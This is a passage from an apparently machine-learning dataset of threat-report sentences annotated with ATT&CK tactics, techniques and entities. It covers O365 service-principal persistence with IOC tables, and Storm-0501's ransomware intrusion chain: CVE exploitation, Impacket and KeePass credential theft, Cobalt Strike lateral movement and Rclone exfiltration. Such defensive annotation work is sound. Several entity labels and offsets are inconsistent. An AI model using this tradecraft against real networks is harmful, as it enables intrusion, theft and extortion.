data", "start": 55, "end": 68, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s230-414b10", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 230, "context_before": "Data from Information Repositories: | The threat actor accessed data from Information Repositories Persistence | T1098.001: Account Manipulation: Additional Cloud Credentials", "sentence_text": "| The threat actor added credentials to O365 Service Principals Persistence | T1078.004 : Valid Accounts: Cloud Accounts", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098.001", "name": "Additional Cloud Credentials" } ], "procedure": "Added new credentials to O365 service principals", "entities": [ { "text": "threat actor ", "start": 6, "end": 19, "label": "ThreatActor" }, { "text": "O365 Service Principals", "start": 40, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "added credentials", "start": 19, "end": 36, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s231-8f2022", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 231, "context_before": "| The threat actor added credentials to O365 Service Principals Persistence | T1078.004 : Valid Accounts: Cloud Accounts", "sentence_text": "| The threat actor created new O365 Service Principals to maintain access to victim's environments Discovery | T1057:", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1098.001", "name": "Additional Cloud Credentials" } ], "procedure": "Created new O365 service principals to maintain access to the victim’s environments.", "entities": [ { "text": " threat actor ", "start": 5, "end": 19, "label": "ThreatActor" }, { "text": "O365 Service Principals", "start": 31, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "victim's environments", "start": 77, "end": 98, "label": "Infrastructure_Indicator" }, { "text": "created new O365 Service Principals to maintain access", "start": 19, "end": 73, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s232-e396a5", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 232, "context_before": "| The threat actor created new O365 Service Principals to maintain access to victim's environments Discovery | T1057:", "sentence_text": "Process Discovery | The threat actor regularly interrogated other systems using tasklist.exe 1326932d63485e299ba8e03bfcd23057f7897c3ae0d26ed1235c4fb108adb105 | TrailBlazer SHA256 vm-srv-1.gel.ulaval.ca", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1057", "name": "Process Discovery" } ], "procedure": "Queried remote systems for running processes using tasklist.exe", "entities": [ { "text": " threat actor ", "start": 23, "end": 37, "label": "ThreatActor" }, { "text": "tasklist.exe", "start": 80, "end": 92, "label": "MalwareTool" }, { "text": "TrailBlazer", "start": 160, "end": 171, "label": "MalwareTool" }, { "text": "1326932d63485e299ba8e03bfcd23057f7897c3ae0d26ed1235c4fb108adb105", "start": 93, "end": 157, "label": "Infrastructure_Indicator" }, { "text": " vm-srv-1.gel.ulaval.ca", "start": 178, "end": 201, "label": "Infrastructure_Indicator" }, { "text": " interrogated other systems", "start": 46, "end": 73, "label": "Action" } ] }, { "uid": "mitre-84_mitre_report-p1-s233-7caec5", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 233, "context_before": "Process Discovery | The threat actor regularly interrogated other systems using tasklist.exe 1326932d63485e299ba8e03bfcd23057f7897c3ae0d26ed1235c4fb108adb105 | TrailBlazer SHA256 vm-srv-1.gel.ulaval.ca", "sentence_text": "| GoldMax C2 2a3b660e19b56dad92ba45dd164d300e9bd9c3b17736004878f45ee23a0177ac | GoldMax SHA256 156.96.46.116 | TA Infrastructure 188.34.185.85 | TA Infrastructure 212.103.61.74 |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s234-4790a5", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 234, "context_before": "| GoldMax C2 2a3b660e19b56dad92ba45dd164d300e9bd9c3b17736004878f45ee23a0177ac | GoldMax SHA256 156.96.46.116 | TA Infrastructure 188.34.185.85 | TA Infrastructure 212.103.61.74 |", "sentence_text": "TA Infrastructure 192.154.224.126 | TA Infrastructure 23.29.115.180 | TA Infrastructure 104.237.218.74 | TA Infrastructure 23.82.128.144", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-84_mitre_report-p1-s235-6e1c89", "source": "mitre", "doc_id": "84_mitre_report", "page_number": 1, "sentence_id": 235, "context_before": "TA Infrastructure 192.154.224.126 | TA Infrastructure 23.29.115.180 | TA Infrastructure 104.237.218.74 | TA Infrastructure 23.82.128.144", "sentence_text": "| TA Infrastructure", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s1-4cffb4", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "Storm-0501: Ransomware attacks expanding to hybrid cloud environments | Microsoft Security Blog Skip to main content Share Link copied to clipboard!", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s2-df4c06", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "Storm-0501: Ransomware attacks expanding to hybrid cloud environments | Microsoft Security Blog Skip to main content Share Link copied to clipboard!", "sentence_text": "Content types\nResearch\nProducts and services Topics Threat intelligence August 27, 2025 update : Storm-0501 has continuously evolved to achieve sharpened focus on cloud-based TTPs as their primary objective shifted from deploying on-premises endpoint ransomware to using cloud-based ransomware tactics.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Evolving from on-premises endpoint ransomware deployment to cloud-based ransomware tactics (cloud TTP focus)", "entities": [ { "text": "Storm-0501", "start": 97, "end": 107, "label": "ThreatActor" }, { "text": " evolved to achieve sharpened focus ", "start": 124, "end": 160, "label": "Action" }, { "text": "shifted from deploying on-premises endpoint ransomware to using cloud-based ransomware tactics", "start": 207, "end": 301, "label": "Action" }, { "text": "on-premises endpoint ransomware ", "start": 230, "end": 262, "label": "MalwareTool" } ] }, { "uid": "mitre-85_mitre_report-p1-s3-94d25a", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "Content types\nResearch\nProducts and services Topics Threat intelligence August 27, 2025 update : Storm-0501 has continuously evolved to achieve sharpened focus on cloud-based TTPs as their primary objective shifted from deploying on-premises endpoint ransomware to using cloud-based ransomware tactics.", "sentence_text": "Read our latest blog on this threat actor:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s4-4d1416", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "Read our latest blog on this threat actor:", "sentence_text": "The threat actor was also recently observed targeting hospitals in the US.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s5-8df445", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "The threat actor was also recently observed targeting hospitals in the US.", "sentence_text": "Storm-0501 is the latest threat actor observed to exploit weak credentials and over-privileged accounts to move from organizations’ on-premises environment to cloud environments.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s6-3bcb96", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "Storm-0501 is the latest threat actor observed to exploit weak credentials and over-privileged accounts to move from organizations’ on-premises environment to cloud environments.", "sentence_text": "They stole credentials and used them to gain control of the network, eventually creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "The threat actor stole credentials, used them to escalate privileges and take over the network, established persistent access to the cloud, and executed a ransomware payload on the on-premises systems.", "entities": [ { "text": " stole credentials", "start": 4, "end": 22, "label": "Action" }, { "text": "gain control of the network,", "start": 40, "end": 68, "label": "Action" }, { "text": "creating persistent backdoor access ", "start": 80, "end": 116, "label": "Action" }, { "text": "deploying ransomware ", "start": 145, "end": 166, "label": "Action" }, { "text": "They", "start": 0, "end": 4, "label": "ThreatActor" }, { "text": "ransomware", "start": 155, "end": 165, "label": "MalwareTool" } ] }, { "uid": "mitre-85_mitre_report-p1-s7-3eb20f", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "They stole credentials and used them to gain control of the network, eventually creating persistent backdoor access to the cloud environment and deploying ransomware to the on-premises.", "sentence_text": "RANSOMWARE AND EXTORTION Learn how you can better protect your organization ↗", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s8-58f944", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "RANSOMWARE AND EXTORTION Learn how you can better protect your organization ↗", "sentence_text": "As hybrid cloud environments become more prevalent, the challenge of securing resources across multiple platforms grows ever more critical for organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s9-c538d0", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "As hybrid cloud environments become more prevalent, the challenge of securing resources across multiple platforms grows ever more critical for organizations.", "sentence_text": "We will also provide information on how Microsoft detects activities related to this kind of attack, as well as provide mitigation guidance to help defenders protect their environment.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s10-42c15b", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "We will also provide information on how Microsoft detects activities related to this kind of attack, as well as provide mitigation guidance to help defenders protect their environment.", "sentence_text": "Analysis of the recent Storm-0501 campaign On-premises compromise Initial access and reconnaissance STORM ACTORS Read about other Storm actors (groups in development) › Storm-0501 previously achieved initial access through intrusions facilitated by access brokers like Storm-0249 and Storm-0900, leveraging possibly stolen compromised credentials to sign in to the target system, or exploiting various known remote code execution vulnerabilities in unpatched public-facing servers.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Used access brokers; used compromised credentials to authenticate; exploited RCE on unpatched servers", "entities": [ { "text": "Storm-0501", "start": 23, "end": 33, "label": "ThreatActor" }, { "text": "Storm-0249 ", "start": 269, "end": 280, "label": "ThreatActor" }, { "text": "Storm-0900", "start": 284, "end": 294, "label": "ThreatActor" }, { "text": "achieved initial access through intrusions", "start": 191, "end": 233, "label": "Action" }, { "text": "ign in to the target system", "start": 351, "end": 378, "label": "Action" }, { "text": "exploiting various known remote code execution vulnerabilities", "start": 383, "end": 445, "label": "Action" }, { "text": " leveraging possibly stolen compromised credentials", "start": 295, "end": 346, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s11-fdb0ad", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Analysis of the recent Storm-0501 campaign On-premises compromise Initial access and reconnaissance STORM ACTORS Read about other Storm actors (groups in development) › Storm-0501 previously achieved initial access through intrusions facilitated by access brokers like Storm-0249 and Storm-0900, leveraging possibly stolen compromised credentials to sign in to the target system, or exploiting various known remote code execution vulnerabilities in unpatched public-facing servers.", "sentence_text": "In a recent campaign, Storm-0501 exploited known vulnerabilities in Zoho ManageEngine (CVE-2022-47966), Citrix NetScaler (CVE-2023-4966), and ColdFusion 2016 application (possibly CVE-2023-29300 or CVE-2023-38203).", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploited CVE-2022-47966, CVE-2023-4966, and ColdFusion CVEs (CVE-2023-29300/CVE-2023-38203) to gain entry", "entities": [ { "text": "Storm-0501", "start": 22, "end": 32, "label": "ThreatActor" }, { "text": "Zoho ManageEngine", "start": 68, "end": 85, "label": "MalwareTool" }, { "text": "Citrix NetScaler", "start": 104, "end": 120, "label": "MalwareTool" }, { "text": "ColdFusion 2016 application ", "start": 142, "end": 170, "label": "MalwareTool" }, { "text": "exploited known vulnerabilities", "start": 33, "end": 64, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s12-b201fc", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "In a recent campaign, Storm-0501 exploited known vulnerabilities in Zoho ManageEngine (CVE-2022-47966), Citrix NetScaler (CVE-2023-4966), and ColdFusion 2016 application (possibly CVE-2023-29300 or CVE-2023-38203).", "sentence_text": "In cases observed by Microsoft, these initial access techniques, combined with insufficient operational security practices by the targets, provided the threat actor with administrative privileges on the target device.", "relevant": "yes", "tactic": [ { "id": "TA0004", "name": "Privilege Escalation" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Used initial access techniques and poor OPSEC to obtain administrative privileges on the target device.", "entities": [ { "text": "threat actor ", "start": 152, "end": 165, "label": "ThreatActor" }, { "text": "provided the threat actor with administrative privileges", "start": 139, "end": 195, "label": "Action" }, { "text": " initial access techniques", "start": 37, "end": 63, "label": "Infrastructure_Indicator" }, { "text": "target device", "start": 203, "end": 216, "label": "Infrastructure_Indicator" }, { "text": "administrative privileges ", "start": 170, "end": 196, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-85_mitre_report-p1-s13-ae5625", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "In cases observed by Microsoft, these initial access techniques, combined with insufficient operational security practices by the targets, provided the threat actor with administrative privileges on the target device.", "sentence_text": "After gaining initial access and code execution capabilities on the affected device in the network, the threat actor performed extensive discovery to find potential desirable targets such as high-value assets and general domain information like Domain Administrator users and domain forest trust.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1087", "name": "Account Discovery" }, { "id": "T1482", "name": "Domain Trust Discovery" } ], "procedure": "Perform extensive discovery to identify high-value assets and domain-related information such as Domain Administrator users and domain trust relationships.", "entities": [ { "text": "performed extensive discovery to find potential desirable targets such as high-value assets and general domain information", "start": 117, "end": 239, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s14-60c12f", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "After gaining initial access and code execution capabilities on the affected device in the network, the threat actor performed extensive discovery to find potential desirable targets such as high-value assets and general domain information like Domain Administrator users and domain forest trust.", "sentence_text": "Common native Windows tools and commands, such as systeminfo.exe , net.exe , nltest.exe , tasklist.exe , were leveraged in this phase.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Used native Windows commands to perform discovery.", "entities": [ { "text": "systeminfo.exe", "start": 50, "end": 64, "label": "MalwareTool" }, { "text": "net.exe", "start": 67, "end": 74, "label": "MalwareTool" }, { "text": "nltest.exe", "start": 77, "end": 87, "label": "MalwareTool" }, { "text": "tasklist.exe", "start": 90, "end": 102, "label": "MalwareTool" }, { "text": "leveraged", "start": 110, "end": 119, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s15-a78aa7", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "Common native Windows tools and commands, such as systeminfo.exe , net.exe , nltest.exe , tasklist.exe , were leveraged in this phase.", "sentence_text": "The threat actor also utilized open-source tools like ossec-win32 and OSQuery to query additional endpoint information.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Threat actor used ossec-win32 and OSQuery to query additional endpoint information.", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "ossec-win32", "start": 54, "end": 65, "label": "MalwareTool" }, { "text": "OSQuery", "start": 70, "end": 77, "label": "MalwareTool" }, { "text": "query additional endpoint information", "start": 81, "end": 118, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s16-5f52bb", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "The threat actor also utilized open-source tools like ossec-win32 and OSQuery to query additional endpoint information.", "sentence_text": "Following initial access and reconnaissance, the threat actor deployed several remote monitoring and management tools (RMMs), such as Level.io, AnyDesk, and NinjaOne to interact with the compromised device and maintain persistence.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1133", "name": "External Remote Services" } ], "procedure": "Deployed RMM tools to remotely access the compromised device and maintain persistence.", "entities": [ { "text": " threat actor", "start": 48, "end": 61, "label": "ThreatActor" }, { "text": "remote monitoring and management tools (RMMs)", "start": 79, "end": 124, "label": "Action" }, { "text": "Level.io", "start": 134, "end": 142, "label": "MalwareTool" }, { "text": "AnyDesk", "start": 144, "end": 151, "label": "MalwareTool" }, { "text": "NinjaOne", "start": 157, "end": 165, "label": "Infrastructure_Indicator" }, { "text": "interact with the compromised device", "start": 169, "end": 205, "label": "Action" }, { "text": "maintain persistence.", "start": 210, "end": 231, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s17-28f0eb", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "Following initial access and reconnaissance, the threat actor deployed several remote monitoring and management tools (RMMs), such as Level.io, AnyDesk, and NinjaOne to interact with the compromised device and maintain persistence.", "sentence_text": "Credential access and lateral movement", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s18-8a379c", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "Credential access and lateral movement", "sentence_text": "The threat actor took advantage of admin privileges on the local devices it compromised during initial access and attempted to gain access to more accounts within the network through several methods.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Used existing admin privileges to attempt accessing additional accounts in the network.", "entities": [ { "text": "threat actor ", "start": 4, "end": 17, "label": "ThreatActor" }, { "text": "took advantage of admin privileges", "start": 17, "end": 51, "label": "Action" }, { "text": "attempted to gain access to more accounts", "start": 114, "end": 155, "label": "Action" }, { "text": "compromised", "start": 76, "end": 87, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s19-cba75d", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "The threat actor took advantage of admin privileges on the local devices it compromised during initial access and attempted to gain access to more accounts within the network through several methods.", "sentence_text": "The threat actor used the compromised credentials to access more devices in the network and then leveraged Impacket again to collect additional credentials.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Used compromised credentials to move to more devices and used Impacket to steal additional credentials.", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "Impacket", "start": 107, "end": 115, "label": "MalwareTool" }, { "text": "used", "start": 17, "end": 21, "label": "Action" }, { "text": "leveraged", "start": 97, "end": 106, "label": "Action" }, { "text": "access more devices in the network", "start": 53, "end": 87, "label": "Action" }, { "text": "collect additional credentials", "start": 125, "end": 155, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s20-a4d0e2", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "The threat actor used the compromised credentials to access more devices in the network and then leveraged Impacket again to collect additional credentials.", "sentence_text": "The threat actor then repeated this process until they compromised a large set of credentials that potentially included multiple Domain Admin credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Repeated credential-theft actions to accumulate many credentials, including Domain Admin accounts.", "entities": [ { "text": "threat actor ", "start": 4, "end": 17, "label": "Infrastructure_Indicator" }, { "text": "credentials", "start": 82, "end": 93, "label": "Infrastructure_Indicator" }, { "text": "compromised a large set of credentials", "start": 55, "end": 93, "label": "Action" }, { "text": "repeated this process", "start": 22, "end": 43, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s21-c6d1c3", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "The threat actor then repeated this process until they compromised a large set of credentials that potentially included multiple Domain Admin credentials.", "sentence_text": "In addition, the threat actor was observed attempting to gather secrets by reading sensitive files and in some cases gathering KeePass secrets from the compromised devices.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555.001", "name": "Keychain" } ], "procedure": "Read sensitive files and extracted KeePass secrets from compromised devices.", "entities": [ { "text": "threat actor", "start": 17, "end": 29, "label": "ThreatActor" }, { "text": "KeePass ", "start": 127, "end": 135, "label": "MalwareTool" }, { "text": "attempting to gather secrets", "start": 43, "end": 71, "label": "Action" }, { "text": "reading sensitive files ", "start": 75, "end": 99, "label": "Action" }, { "text": "gathering KeePass secrets", "start": 117, "end": 142, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s22-e5fa6b", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "In addition, the threat actor was observed attempting to gather secrets by reading sensitive files and in some cases gathering KeePass secrets from the compromised devices.", "sentence_text": "The threat actor used EncryptedStore’s Find-KeePassConfig.ps1 PowerShell script to output the database location and keyfile/user master key information and launch the KeePass executable to gather the credentials.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1555", "name": "Credentials from Password Stores" } ], "procedure": "Used a PowerShell script to locate KeePass database and keys, then launched KeePass to extract credentials.", "entities": [ { "text": "The threat actor ", "start": 0, "end": 17, "label": "ThreatActor" }, { "text": "EncryptedStore’s", "start": 22, "end": 38, "label": "MalwareTool" }, { "text": "Find-KeePassConfig.ps1", "start": 39, "end": 61, "label": "MalwareTool" }, { "text": "PowerShell script ", "start": 62, "end": 80, "label": "MalwareTool" }, { "text": "KeePass executable", "start": 167, "end": 185, "label": "MalwareTool" }, { "text": "used EncryptedStore’s", "start": 17, "end": 38, "label": "Action" }, { "text": "output the database location", "start": 83, "end": 111, "label": "Action" }, { "text": "aunch the KeePass executable", "start": 157, "end": 185, "label": "Action" }, { "text": "gather the credentials.", "start": 189, "end": 212, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s23-7d9745", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "The threat actor used EncryptedStore’s Find-KeePassConfig.ps1 PowerShell script to output the database location and keyfile/user master key information and launch the KeePass executable to gather the credentials.", "sentence_text": "We assess with medium confidence that the threat actor also performed extensive brute force activity on a few occasions to gain additional credentials for specific accounts.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1110", "name": "Brute Force" } ], "procedure": "Performed brute-force attempts to obtain additional account credentials.", "entities": [ { "text": "threat actor ", "start": 42, "end": 55, "label": "ThreatActor" }, { "text": "performed extensive brute force activity on a few occasions", "start": 60, "end": 119, "label": "Action" }, { "text": "gain additional credentials for specific accounts.", "start": 123, "end": 173, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s24-ef8f65", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "We assess with medium confidence that the threat actor also performed extensive brute force activity on a few occasions to gain additional credentials for specific accounts.", "sentence_text": "The threat actor was observed leveraging Cobalt Strike to move laterally across the network using the compromised credentials and using the tool’s command-and-control (C2) capabilities to directly communicate with the endpoints and send further commands.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1021", "name": "Remote Services" } ], "procedure": "Used Cobalt Strike to move laterally with compromised credentials and issue commands via C2.", "entities": [ { "text": "threat actor ", "start": 4, "end": 17, "label": "ThreatActor" }, { "text": "Cobalt Strike", "start": 41, "end": 54, "label": "MalwareTool" }, { "text": " leveraging Cobalt Strike", "start": 29, "end": 54, "label": "Action" }, { "text": "move laterally across the network", "start": 58, "end": 91, "label": "Action" }, { "text": "using the compromised credentials", "start": 92, "end": 125, "label": "Action" }, { "text": "using the tool’s command-and-control (C2) ", "start": 130, "end": 172, "label": "Action" }, { "text": "communicate with the endpoints ", "start": 197, "end": 228, "label": "Action" }, { "text": "send further commands", "start": 232, "end": 253, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s25-f739c4", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "The threat actor was observed leveraging Cobalt Strike to move laterally across the network using the compromised credentials and using the tool’s command-and-control (C2) capabilities to directly communicate with the endpoints and send further commands.", "sentence_text": "The common Cobalt Strike Beacon file types used in these campaigns were .dll files and .ocx files that were launched by rundll32.exe and regsvr32.exe respectively.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1218.011", "name": "Rundll32" } ], "procedure": "Executed Cobalt Strike Beacon DLL and OCX files using rundll32.exe and regsvr32.exe.", "entities": [ { "text": " Cobalt Strike Beacon ", "start": 10, "end": 32, "label": "MalwareTool" }, { "text": ".dll files ", "start": 72, "end": 83, "label": "MalwareTool" }, { "text": "ocx files", "start": 88, "end": 97, "label": "MalwareTool" }, { "text": "rundll32.exe", "start": 120, "end": 132, "label": "MalwareTool" }, { "text": "regsvr32.exe", "start": 137, "end": 149, "label": "MalwareTool" }, { "text": "launched by rundll32.exe and regsvr32.exe", "start": 108, "end": 149, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s26-e0c4ea", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "The common Cobalt Strike Beacon file types used in these campaigns were .dll files and .ocx files that were launched by rundll32.exe and regsvr32.exe respectively.", "sentence_text": "Moreover, the “license_id” associated with this Cobalt Strike Beacon is “666”.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s27-74b674", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 27, "context_before": "Moreover, the “license_id” associated with this Cobalt Strike Beacon is “666”.", "sentence_text": "The “license_id” definition is commonly referred to as Watermark and is a nine-digit value that is unique per legitimate license provided by Cobalt Strike.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-85_mitre_report-p1-s28-90149b", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 28, "context_before": "The “license_id” definition is commonly referred to as Watermark and is a nine-digit value that is unique per legitimate license provided by Cobalt Strike.", "sentence_text": "In this case, the “license_id” was modified with 3-digit unique value in all the beacon configurations.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "Modify the Cobalt Strike Beacon license_id value in beacon configurations.", "entities": [ { "text": "was modified with 3-digit unique value", "start": 31, "end": 69, "label": "Action" }, { "text": "beacon configurations", "start": 81, "end": 102, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-85_mitre_report-p1-s29-55ce4b", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 29, "context_before": "In this case, the “license_id” was modified with 3-digit unique value in all the beacon configurations.", "sentence_text": "In cases we observed, the threat actor’s lateral movement across the campaign ended with a Domain Admin compromise and access to a Domain Controller that eventually enabled them to deploy ransomware across the devices in the network.", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1486", "name": "Data Encrypted for Impact" } ], "procedure": "Used lateral movement to compromise Domain Admin, access the Domain Controller, and deploy ransomware across devices.", "entities": [ { "text": "threat actor’s ", "start": 26, "end": 41, "label": "ThreatActor" }, { "text": "ransomware ", "start": 188, "end": 199, "label": "MalwareTool" }, { "text": "lateral movement across the campaign ended with a Domain Admin compromise", "start": 41, "end": 114, "label": "Action" }, { "text": "ccess to a Domain Controller", "start": 120, "end": 148, "label": "Action" }, { "text": "enabled them to deploy ransomware across the devices", "start": 165, "end": 217, "label": "Action" }, { "text": "devices in the network", "start": 210, "end": 232, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-85_mitre_report-p1-s30-ec565d", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 30, "context_before": "In cases we observed, the threat actor’s lateral movement across the campaign ended with a Domain Admin compromise and access to a Domain Controller that eventually enabled them to deploy ransomware across the devices in the network.", "sentence_text": "Data collection and exfiltration The threat actor was observed exfiltrating sensitive data from compromised devices.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1041", "name": "Exfiltration Over C2 Channel" } ], "procedure": "Exfiltrated sensitive data from compromised devices.", "entities": [ { "text": " threat actor", "start": 36, "end": 49, "label": "ThreatActor" }, { "text": " exfiltrating sensitive data", "start": 62, "end": 90, "label": "Action" } ] }, { "uid": "mitre-85_mitre_report-p1-s31-db1cf1", "source": "mitre", "doc_id": "85_mitre_report", "page_number": 1, "sentence_id": 31, "context_before": "Data collection and exfiltration The threat actor was observed exfiltrating sensitive data from compromised devices.", "sentence_text": "To exfiltrate data, the threat actor used the open-source tool Rclone and renamed it to known Windows binary names or variations of them, such as svhost.exe or scvhost.exe as masquerading means.", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" }, { "id": 